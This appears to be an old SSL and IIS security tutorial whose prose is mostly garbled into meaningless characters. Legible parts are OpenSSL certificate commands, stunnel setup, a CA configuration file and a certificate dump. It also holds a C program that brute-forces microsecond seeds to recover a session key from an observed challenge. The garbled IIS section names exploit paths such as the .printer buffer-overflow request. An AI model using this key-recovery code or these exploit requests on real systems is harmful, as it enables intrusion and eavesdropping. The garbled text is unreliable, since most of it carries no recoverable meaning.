a, % ,Proot 6 CSR "
openssl x509 -req -in careq.pem -signkey key.pem -out cacert.pem
> 6 ), & L3 , B ) 6 " - Y CSR " a,
openssl x509 -req -in req.pem -CA cacert.pem -CAkey key.pem -CAcreateserial
F) 1/ ) SSL b a -,< & 7 !89 ? ) , #4 ? ! . ? @2 & " H ) ,< " , T) , " U4 - 1/ ) a 2 U) … ], 5 T # , U) 5 -, < - < Stunnel ) ) 6 F) 3 ' ), ,< 6 @ 9 ] ,< -, < & " ' - Y SSL Wrapper \ 2 0 E n 9 2, ? ) I 0_ IMAP ) 6 &'( 7Y SLL 5 SSL 1/ 2 " , ? SSl " - Y ?# 'X ?@ ) ' 6 &'( I 0 _Apache O) ) b' 1/ 2 7 !89 T 6U ) SSL 7 # ) ,< 0 & =B* ' a ' ) ) L3 , B L3 , B ,1
openssl genrsa -out key.pem 1024
a CSR 0 L3 , B b ?@ ? > a 6 ' ), CSR ? & " - Y CSR ? " ,1 ' >
openssl x509 – req – in csr. Pem – signkey key key. Pem – pem – out . pem – days 365
POP3 ) - 56 Stunnel &'( SSL " -,Y - . \ X " POP3 ) ?,< - 56 SSL " - Y a 2#5 n 9 ) 2<) 5 H2 < - iX Stunnel " 0 < - Y 7 4 @)- ,6 A a ' {{Š - 5 < 7 wwq - 5 < 7 4 H ) 6script 7 4" b , 7 !89 Stunnel -, < & 7 !89 2 ) , " 7 Y wwq - 5< 2 0, < A" 4
stunnel -d 995 -p /usr/local/ssl/certs/stunnel.pem -r localhost:110
U) , )" ' 7 -,< & 7 !89 Stunnel {{Š - 5< 7 4 " 2 0, F -, < & a !89 2 A" H 4 6Script 7
stunnel -d 995 -p /usr/local/ssl/certs/stunnel.pem -l /usr/sbin/imapd
) L3 , B % < S stunnel.pem c % ' , B " , G Stunnel.pem % ' 0, < 0,< < _ -, F) , & ) 7 13 : 6 ] ) ) W 3 L*< ¢ ^P 2 0, , — ) ? 59 5 < ? 3 IE " , 6 6 , 5 '— " 5< - P< ?# !89 % < , : 56 6 0_ B # %. $ P! 7, $ % 5 h @ $ ( , 56$ - 5 > 7 !89 2 L*< 1 E hash % H 56 ? 4 ) H , > ) 5< '2 F T/ 6 ?@ S/ )h @ 5! , B % < 6 I " - Y ) 6 CA 0 5!
- ›, ) > )- R , $O) CA ' 7 !89 7 )&B " 5< @ & L3 0 @^ 2 0, —L*< — 5< , 5 ) R 6 6 ) 1E N 2 2 `560 0,< $, - 5 ^P < ? 59 6 ], 7 !89 ) ), N c 5G 5< " €,< $, 6 ? 59 ) L3 —6 M 9 ?@ — › GH ) @ €, - › '2 ) - ) 6 " ,G & ) a Certificate ? I 6 5< 5! & 5 ' N 56 6 c 5G 0,< C 2 SSL (Certificate Authority) 6> 56 1% < a "7 —6 ¢ 2 * A)

CA.pl -newcert
(openssl req -config /etc/openssl.cnf -new -x509 -keyout newreq.pem \
 -out newreq.pem -days 365)

# b F 6 6 6 0 , ( 5 0, ? 59 % H g 5 <$ 1E u) j -,< > 3 6 0, ?@ 66 6 > " )% HC 8 -, < > $, T 6 6 ) > A 3 \ 2 " 6CA 6 a 6 6 2 " # " 5

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C=FJ, ST=Fiji, L=Suva, O=SOPAC, OU=ICT, CN=SOPAC Root CA/[email protected]
            Not Before: Nov 20 05:47:44 2001 GMT
            Not After : Nov 20 05:47:44 2002 GMT
        Subject: C=FJ, ST=Fiji, L=Suva, O=SOPAC, OU=ICT, CN=www.sopac.org/[email protected]
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                    00:ba:54:2c:ab:88:74:aa:6b:35:a5:a9:c1:d0:5a:
                    9b:fb:6b:b5:71:bc:ef:d3:ab:15:cc:5b:75:73:36:
                    b8:01:d1:59:3f:c1:88:c0:33:91:04:f1:bf:1a:b4:
                    7a:c8:39:c2:89:1f:87:0f:91:19:81:09:46:0c:86:
                    08:d8:75:c4:6f:5a:98:4a:f9:f8:f7:38:24:fc:bd:
                    94:24:37:ab:f1:1c:d8:91:ee:fb:1b:9f:88:ba:25:
                    da:f6:21:7f:04:32:35:17:3d:36:1c:fb:b7:32:9e:
                    42:af:77:b6:25:1c:59:69:af:be:00:a1:f8:b0:1a:
                    6c:14:e2:ae:62:e7:6b:30:e9
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints:
                CA:FALSE
            Netscape Comment:
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier:
                FE:04:46:ED:A0:15:BE:C1:4B:59:03:F8:2D:0D:ED:2A:E0:ED:F9:2F
            X509v3 Authority Key Identifier:
                keyid:E6:12:7C:3D:A1:02:E5:BA:1F:DA:9E:37:BE:E3:45:3E:9B:AE:E5:A6
                DirName:/C=FJ/ST=Fiji/L=Suva/O=SOPAC/OU=ICT/CN=SOPAC Root CA/Email=administrator@
                serial:00
    Signature Algorithm: md5WithRSAEncryption
        34:8d:fb:65:0b:85:5b:e2:44:09:f0:55:31:3b:29:2b:f4:fd:
        aa:5f:db:b8:11:1a:c6:ab:33:67:59:c1:04:de:34:df:08:57:
        2e:c6:60:dc:f7:d4:e2:f1:73:97:57:23:50:02:63:fc:78:96:
        34:b3:ca:c4:1b:c5:4c:c8:16:69:bb:9c:4a:7e:00:19:48:62:
        e2:51:ab:3a:fa:fd:88:cd:e0:9d:ef:67:50:da:fe:4b:13:c5:
        0c:8c:fc:ad:6e:b5:ee:40:e3:fd:34:10:9f:ad:34:bd:db:06:
        ed:09:3d:f2:a6:81:22:63:16:dc:ae:33:0c:70:fd:0a:6c:af:
        bc:5a

nB G 5! , B 0 n: # " ? 59 ,B 6 T ?@ # 0, › 6 , B 0 B . " B . # ] < - Y 6 6 'X R & T -, '-,< , ?@ S/ b -, < -,< > ( 4 F 6 6 b' 2 0 <- , P! $ N 56 2 S/ 7 !89 F " , P & 6, B 2 & ' 56 ) / 6 )/ > ? ") 6 2 N %. - Y GF " , # 3 L3 L3 , B N 7 P ! 6- ) 6 6 , P) $, < R & ( 4b . , )_ L3 a OpenSSL , #4% '

#---Begin---
#
# OpenSSL example configuration file.
# This is mostly being used for generation of certificate requests.
#

RANDFILE = $ENV::HOME/.rnd
oid_file = $ENV::HOME/.oid
oid_section = new_oids

# To use this configuration file with the "-extfile" option of the
# "openssl x509" utility, name here the section containing the
# X.509v3 extensions to use:
# extensions =
# (Alternatively, use a configuration file that has only
# X.509v3 extensions in its main [= default] section.)

[ new_oids ]

# We can add new OIDs in here for use by 'ca' and 'req'.
# Add a simple OID like this:
# testoid1=1.2.3.4
# Or use config file substitution like this:
# testoid2=${testoid1}.5.6

####################################################################
[ ca ]
default_ca = CA_default  # The default ca section

####################################################################
[ CA_default ]

dir = /var/ssl  # Where everything is kept
certs = $dir/certs  # Where the issued certs are kept
crl_dir = $dir/crl  # Where the issued crl are kept
database = $dir/index.txt  # database index file.
new_certs_dir = $dir/newcerts  # default place for new certs.

certificate = $dir/cacert.pem  # The CA certificate
serial = $dir/serial  # The current serial number
crl = $dir/crl.pem  # The current CRL
private_key = $dir/private/cakey.pem  # The private key
RANDFILE = $dir/private/.rand  # private random number file

x509_extensions = usr_cert  # The extensions to add to the cert

# Extensions to add to a CRL. Note: Netscape communicator chokes on V2 CRLs
# so this is commented out by default to leave a V1 CRL.
# crl_extensions = crl_ext

default_days = 365  # how long to certify for
default_crl_days= 7  # how long before next CRL
default_md = sha1  # which md to use.
preserve = no  # keep passed DN ordering

# A few different ways of specifying how similar the request should look
# For type CA, the listed attributes must be the same, and the optional
# and supplied fields are just that :-)
policy = policy_match

# For the CA policy
[ policy_match ]
countryName = match
stateOrProvinceName = optional
localityName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

# For the 'anything' policy
# At this point in time, you must list all acceptable 'object'
# types.
[ policy_anything ]
countryName = optional
stateOrProvinceName = optional
localityName = optional
organizationName = optional
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

####################################################################
[ req ]
default_bits = 1024
default_keyfile = privkey.pem
distinguished_name = req_distinguished_name
attributes = req_attributes
default_md = sha1
x509_extensions = v3_ca  # The extensions to add to the self signed cert

# Passwords for private keys if not present they will be prompted for
# input_password = secret
# output_password = secret

# This sets a mask for permitted string types. There are several options.
# default: PrintableString, T61String, BMPString.
# pkix : PrintableString, BMPString.
# utf8only: only UTF8Strings.
# nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings).
# MASK:XXXX a literal mask value.
# WARNING: current versions of Netscape crash on BMPStrings or UTF8Strings
# so use this option with caution!
string_mask = nombstr

# req_extensions = v3_req # The extensions to add to a certificate request

[ req_distinguished_name ]
countryName = Country Name (2 letter code)
countryName_default = FJ
countryName_min = 2
countryName_max = 2

stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = Fiji

localityName = Locality Name (eg, city)
localityName_default = Suva

0.organizationName = Organization Name (eg, company)
0.organizationName_default = SOPAC

# we can do this but it is not needed normally :-)
#1.organizationName = Second Organization Name (eg, company)
#1.organizationName_default = World Wide Web Pty Ltd

organizationalUnitName = Organizational Unit Name (eg, section)
organizationalUnitName_default = ITU

commonName = Common Name (eg, YOUR name)
commonName_max = 64

emailAddress = Email Address
emailAddress_max = 40

# SET-ex3 = SET extension number 3

[ req_attributes ]
challengePassword = A challenge password
challengePassword_min = 4
challengePassword_max = 20

unstructuredName = An optional company name

[ usr_cert ]

# These extensions are added when 'ca' signs a request.

# This goes against PKIX guidelines but some CAs do it and some software
# requires this to avoid interpreting an end user certificate as a CA.

basicConstraints=CA:FALSE

# Here are some examples of the usage of nsCertType. If it is omitted
# the certificate can be used for anything *except* object signing.

# This is OK for an SSL server.
# nsCertType = server

# For an object signing certificate this would be used.
# nsCertType = objsign

# For normal client use this is typical
# nsCertType = client, email

# and for everything including object signing:
# nsCertType = client, email, objsign

# This is typical in keyUsage for a client certificate.
# keyUsage = nonRepudiation, digitalSignature, keyEncipherment

# This will be displayed in Netscape's comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/" # PKIX recommendations harmless if included in all certificates. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid,issuer:always # This stuff is for subjectAltName and issuerAltname. # Import the email address. # subjectAltName=email:copy # Copy subject details # issuerAltName=issuer:copy # This is the base URL for all others URL addresses # if not supplied nsBaseUrl = https://www.sopac.org/ssl/ # This is the link where to download the latest Certificate # Revocation List (CRL) nsCaRevocationUrl = https://www.sopac.org/ssl/sopac−ca.crl # This is the link where to revoke the certificate nsRevocationUrl = https://www.sopac.org/ssl/revocation.html? # This is the location where the certificate can be renewed nsRenewalUrl = https://www.sopac.org/ssl/renewal.html? # This is the link where the CA policy can be found nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html # This is the link where we can get the issuer certificate issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt # This is the link where to get the latest CRL crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac−ca.crl [ v3_ca ] # Extensions for a typical CA # PKIX recommendation. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid:always,issuer:always # This is what PKIX recommends but some broken software chokes on critical # extensions. # basicConstraints = critical,CA:true # So we do this instead. basicConstraints = CA:true # Key usage: this is typical for a CA certificate. However since it will # prevent it being used as an test self−signed certificate it is best # left out by default. # keyUsage = cRLSign, keyCertSign # Some might want this also # nsCertType = sslCA, emailCA # Include email address in subject alt name: another PKIX recommendation # subjectAltName=email:copy # Copy issuer details # issuerAltName=issuer:copy # RAW DER hex encoding of an extension: beware experts only! 
# 1.2.3.5=RAW:02:03
# You can even override a supported extension:
# basicConstraints= critical, RAW:30:03:01:01:FF

# This will be displayed in Netscape's comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"

# This is the base URL for all other URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/
# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac-ca.crl
# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?
# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?
# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html
# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt
# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac-ca.crl

[ crl_ext ]
# CRL extensions.
# Only issuerAltName and authorityKeyIdentifier make any sense in a CRL.
# issuerAltName=issuer:copy
authorityKeyIdentifier=keyid:always,issuer:always
#----End----

a =B* a 6 _CA] 6 ,F 'X " ) 2 ) SL A) 6 , openssl x509 -in cacert.pem -out cacert.crt a "h @ ,6 H? 3 O) -,< E % '2 http://yoursite.com/ssl/cacert.crt ? < crt \ " ,< 0 <– R •Y , $, ) - 3• H . , " U4 @ P < 5< 6 #6•Y " & 5 <0 < ") 6 3 6 @ B F ") 0, 5 'X , " j ? •Y b update 'G 3- B 5F " ) - 3•S B Netscapeb 2 0, K5 %. ? 5 5< @ ) ,6 d * SL %/ N4 ) < (E 6& \ , C 5 / SL B / ? 4 %P H" , d* 0 … ) 6,› 3 5 $%5 5! @ 6> $ ? 'X 0, 6 , F) ) SL ), < SL A) O) " 0, 5 YB* ("c – 6— 6 , 3% ! ') # —6 5< < 6 ), Nh5 -N4 # F ') # P # 7, , # 5< ) a Mozilla ) Netscape : O) # - , , " ,6 * ? O) $ ) 42 5< ) -,< - @ 5< 6 F? 0 6 b 2 `56, 5 6 3 j< 4 ) ), O) ) , CA 6 CA , < ) $ " " , < MIME \ " B' 7 # 6 - Y O) $ % !
a Galeon ) ,< ,6 3 6 2 " , –6 SL A) HTML 5F 0 " ) F) Galeon , 6 6 " $, % 5! Mozilla , 3 & 2 CH Galeon ), a Internet Explorer I'/ ) " 0 9 6 D ?@ S L @ 2 2 T % ') - 3 6 & d* , B- : IE _-, < Z> 6,G 6 3] I.12 " , F SSL %•) 4 " , — ) h @ ) - Y SL A) ? ) b ) % ' ) 0, K5 - 3• 3 , 3 6 SL 5! ,6 3 5 ! 6 2 # KE @ 6 6 ,< -,< Z> CA 0, K5 - Y 6- aC?"

/* #include <std/disclaimer.h> -- not a real header; commented out so the file compiles */
#include <stdio.h>
#include <stdlib.h>
#include <string.h> /* strlen, memcmp */

typedef unsigned int UINT4;

/* Per-round shift amounts */
#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21

#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))

/* ROTATE_LEFT rotates x left n bits. */
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))

/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
   Rotation is separate from addition to prevent recomputation. */
#define FF(a, b, c, d, x, s, ac) { \
    (a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define GG(a, b, c, d, x, s, ac) { \
    (a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define HH(a, b, c, d, x, s, ac) { \
    (a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define II(a, b, c, d, x, s, ac) { \
    (a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }

/* One MD5 compression step over a single 64-byte block, always starting
   from the fixed initial values below; the 16-byte result is written to
   state[] with the bytes of each word swapped. */
void MD5Transform1(unsigned char state[16], unsigned char block[64])
{
  UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d = 0x10325476, x[16];
  unsigned int i,j;

  /* Load the block as sixteen little-endian 32-bit words */
  for (i = 0, j = 0; j < 64; i++, j += 4)
    x[i] = ((UINT4)block[j]) | (((UINT4)block[j+1]) << 8) |
      (((UINT4)block[j+2]) << 16) | (((UINT4)block[j+3]) << 24);

  /* Round 1 */
  FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
  FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
  FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
  FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
  FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
  FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
  FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
  FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
  FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
  FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
  FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
  FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
  FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
  FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
  FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
  FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */

  /* Round 2 */
  GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
  GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
  GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
  GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
  GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
  GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */
  GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
  GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
  GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
  GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
  GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
  GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
  GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
  GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
  GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
  GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */

  /* Round 3 */
  HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
  HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
  HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
  HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
  HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
  HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
  HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
  HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
  HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
  HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
  HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
  HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */
  HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
  HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
  HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
  HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */

  /* Round 4 */
  II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
  II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
  II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
  II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
  II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
  II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
  II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
  II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
  II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
  II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
  II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
  II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
  II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
  II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
  II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
  II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */

  a += 0x67452301;
  b += 0xefcdab89;
  c += 0x98badcfe;
  d += 0x10325476;

  /* We need to swap endianness here */
  state[0] = ((unsigned char *)&a)[3];
  state[1] = ((unsigned char *)&a)[2];
  state[2] = ((unsigned char *)&a)[1];
  state[3] = ((unsigned char *)&a)[0];
  state[4] = ((unsigned char *)&b)[3];
  state[5] = ((unsigned char *)&b)[2];
  state[6] = ((unsigned char *)&b)[1];
  state[7] = ((unsigned char *)&b)[0];
  state[8] = ((unsigned char *)&c)[3];
  state[9] = ((unsigned char *)&c)[2];
  state[10] = ((unsigned char *)&c)[1];
  state[11] = ((unsigned char *)&c)[0];
  state[12] = ((unsigned char *)&d)[3];
  state[13] = ((unsigned char *)&d)[2];
  state[14] = ((unsigned char *)&d)[1];
  state[15] = ((unsigned char *)&d)[0];
}

#define mklcpr(val) ((0xdeece66d*(val)+0x2bbb62dc)>>1)

int main(int argc, char **argv)
{
  int i;
  unsigned char maybe_challenge[16], true_challenge[16];
  unsigned char key[16];
  char *p;
  unsigned long sec, usec, pid, ppid;
  unsigned char eblock[64], cblock[64];
  unsigned char *o1;
  int o2;

  /* Arguments: seconds, pid, ppid and the observed 16-byte challenge
     written as colon-separated hex bytes */
  if (argc == 5 && strlen(argv[4]) >= 47) {
    sec = strtol(argv[1], (char **) 0, 0);
    pid = strtol(argv[2], (char **) 0, 0);
    ppid = strtol(argv[3], (char **) 0, 0);
    p = argv[4];
    for (i=0; i<16; i++) {
      true_challenge[i] = strtol(p, &p, 16);
      p++;
    }
  } else {
    printf("Usage: %s sec pid ppid "
           "00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff\n", argv[0]);
    exit(1);
  }

  /* Set up eblock and cblock */
  for(i=0;i<64;++i) eblock[i]=0;
  eblock[8] = 0x80;
  eblock[56] = 0x40;
  for(i=0;i<64;++i) cblock[i]=0;
  cblock[16] = 0x80;
  cblock[56] = 0x80;
  ((int *)eblock)[1] = mklcpr(pid+sec+(ppid<<12));

  /* Try every microsecond value (2^20 candidates) and compare the
     challenge derived from it with the one supplied on the command line */
  for (usec=0; usec < (1<<20); usec++) {
    ((int *)eblock)[0] = mklcpr(usec);
    MD5Transform1(cblock, eblock);
    o2 = 0; o1 = &(cblock[0x0f]);
    do { if ((*o1)++) break; --o1; } while (++o2 <= 0x0f);
    o2 = 0; o1 = &(cblock[0x0f]);
    do { if ((*o1)++) break; --o1; } while (++o2 <= 0x0f);
    MD5Transform1(maybe_challenge, cblock);
    if (memcmp(maybe_challenge, true_challenge, 0x10) == 0) {
      printf("Found it! The key is ");
      o2 = 0; o1 = &(cblock[0x0f]);
      do { if ((*o1)++) break; --o1; } while (++o2 <= 0x0f);
      MD5Transform1(key, cblock);
      for (i=0; i<0x10; i++)
        printf("%2.2X ", (unsigned char) key[i]);
      printf("\n");
      printf("usec = %lu\n", usec);
      exit(0);
    }
  }
  printf("Not found.\n");
  exit(1);
}

Microsoft internet information server (IIS) T , ) O) 6) 2 0,< " 6b. 2 O) ? •Y B 5/ 1! M,6 -,< ;! 256) YGX$? # B) )h 4 2 +' , ,F n & n 9" IIS ) ( < 6* a I , B , ) 6=GX \ Y, YGX 6 Y1 IIS # G ) 6, i X 0,E N T) E 785/ 2 ) P1 # (DLL) # B 6 6 * ) 4 , " ! 5E H ) 6$;.P 2 @ ! 6 Y1 £ B ! B 5/ - % G N, # B ! B 5/… 3 B ! B 5/… ? IIS - P1, -,< IIS ? IIS 1Q ? #<@ - NB 4 6F 6ˆ4 b -,< K , ,F 7c L. " -) " F$showcode.asp 7 2 `56) , -,< K 0, -,< K H O) ? • Y 785/ )_MDAC/RDS]- ' & 3 3 2 " 5 - " #<@$::$DATA P <6 7 !89 " ? 0 ) # IIS 4" 56% 1 256 0 6=GX 7 - Y 7 IIS ! 5E 2 inetinfo.exe$ ,6* 0, - % ' b .prniter, , 4 % ' E " DDL 3 B'2 - TQ 0 < 6 K 7 B ) 256 ) , 6 v 4 $, 3 IIS " E B 5! 7 L3 , 4 -, < / 9 DDL " $_, < 3 F % '2 0, bP - N 4 j 40 N ISAPI 7 B 5! ( E w 3 PHP)COLdfusion I K6-, " /7 IIS S L ? " ) - 1 @ B) " - 6 B'" $IIS0, 5 ), @0 , 3 f 0, % ' $ 1 2 3 'j 4 7 5G 2 ISAPI " - Y P4 F ' R4 S @ ^ ISAPI 6 H B 5/ $n 9 2 " ,< O * " 6 ' ? 5F 6 @^ F -, 6 U ) ) ) 6% L * iX 0, 4 ) 7 # 0_URL 6=GX) 78# ) -, < - )@ o " ], 5 , 5 7 6 5$ ), 6' -, 6 U ) ) i. ) H ? 5F $ F 6 ) nH , ,F R4 S @ ^ F) N ntdll.dll webDAV SL IIS ) T#< ) =GX 3 " F 6h @ I ], N 0, 5 6 ' -, < SL T L. " N 6 ) ) " ?5F 3 - *1 7 _PHP)coldfusion $ R4 S @ ^ H $O) ( N (, !0, - 5 - Y F F) E ) ) 6URLb 6 , N) # 6, 6DLL ? 5 TG' g]dos \ " 785/ ?# $ IIS 5.0 3 I g " l '=GX " 8Q 0 )@ C _SL ] 7 L ? 56 B ) - Y $O) 2 56, -,< I N "$ 1 ) S L " U 4 IISS R 4S 6 L C85! ) - PS L B'\ 2 " " E + E'IIS 6 ) )‚ code red2 ) code red0, _U ) k " ,G , 5 -,< ;! - Y Z % .6 3 M ,6 )e ? •Y B3 3 4 RN $p ISAPI -,< ,F ) W 3 7 B 5! (&B $ ISAPI 6 B'" ) O) V < )_server side includes]SSI$_active server pages]ASP k ?
P1] 3 ], < 7 ) X ") F ", ) & , # 4 (,! % 1 , , & IIS 1Q0_ N T L. ,< T L. 1 -handel internet server application programming interface 2 <R 1 , n 9 " 785/ 1 ) ) N , GH ) 1QZ&F P 10 I, 6, -" F -,< ? 0, - @- - Y Z < ISAPI 0 < ISAPI DLL 0, < ' & IIS O) b - 4 ' ( E ISAPI ) 785/$ < 6) & " 4 pqqp T 785/ 2 6=GX " " j* 2 N # pqqp T 2 ' 0 & % )@ = P 4 HTTP , @ - 1 @ b ISAPI DLL ) ^ ? eEye n 9" k ‹pq C P 0 @ 1Q F ' & 3 " # Digital security$pqqw ISAPI B' % # ) 4_c:\winnt\system32\msw3prt.dll] B' k #P < 6 N4 "T Q -,< " 0 printer P 4 _IPP]s # 3) h 0, - (8! $, 0, ) ) pqqw T Ÿ 0 6 B'?) " 60, , < ? ) nimda)codered ) ASP 7 .Y 0, < +P 85/ 2 % 6ISAPI DLL O) ) -,< @" <- =B* ' ,@ 'printer F ISAPI 0 ',6 3 lY 2 IPP0, 6 PF H) Ÿ HOST 3 6 2 420[buffer] 5 H H GET/NUL.printer HTTP/1.0 HOST:[buffer] "), ) < < <& ;! )_information], =GX 2 ;! , IIS) 0 < P 10, ' F- ) " , - e 'j 4 ) < ;! - IIS 1 ) 7 1/ 1P 7 L ;! $ < " , - - ) IIS # N60_ < B H B G 1/ ) , 2 pqqq O) ,4 ‚,6 H) # &F ] 3 ) IIS . [ ˆ6 ) ) ,6 Ÿ IIS 3 'L 2' R 6:3 internet printing protocol ISAPI DLL 5 printer ' & b )@ 6 3 + F) ISAPI DLL j 5 !89 ? , ,< F) ? # " %P H " ,< l ' bB g +P % '2 < " - Y , 5< +.htr 3 F) ISAPI DLL @j 5 ,< , - j 5 - 3 ) , F" G F 0, ,6 =GX $ < F IIS b <N ISM.DLL htr.txt ( F % '+ ISM.DLL -, ,< '0 ! 1/ 7 < " 3 TQ +.htr '" ?@ ? 56 -, @ + " E$ " U) ,< Ÿ 1Q 5 H 2 Q /P " • & - ;! 
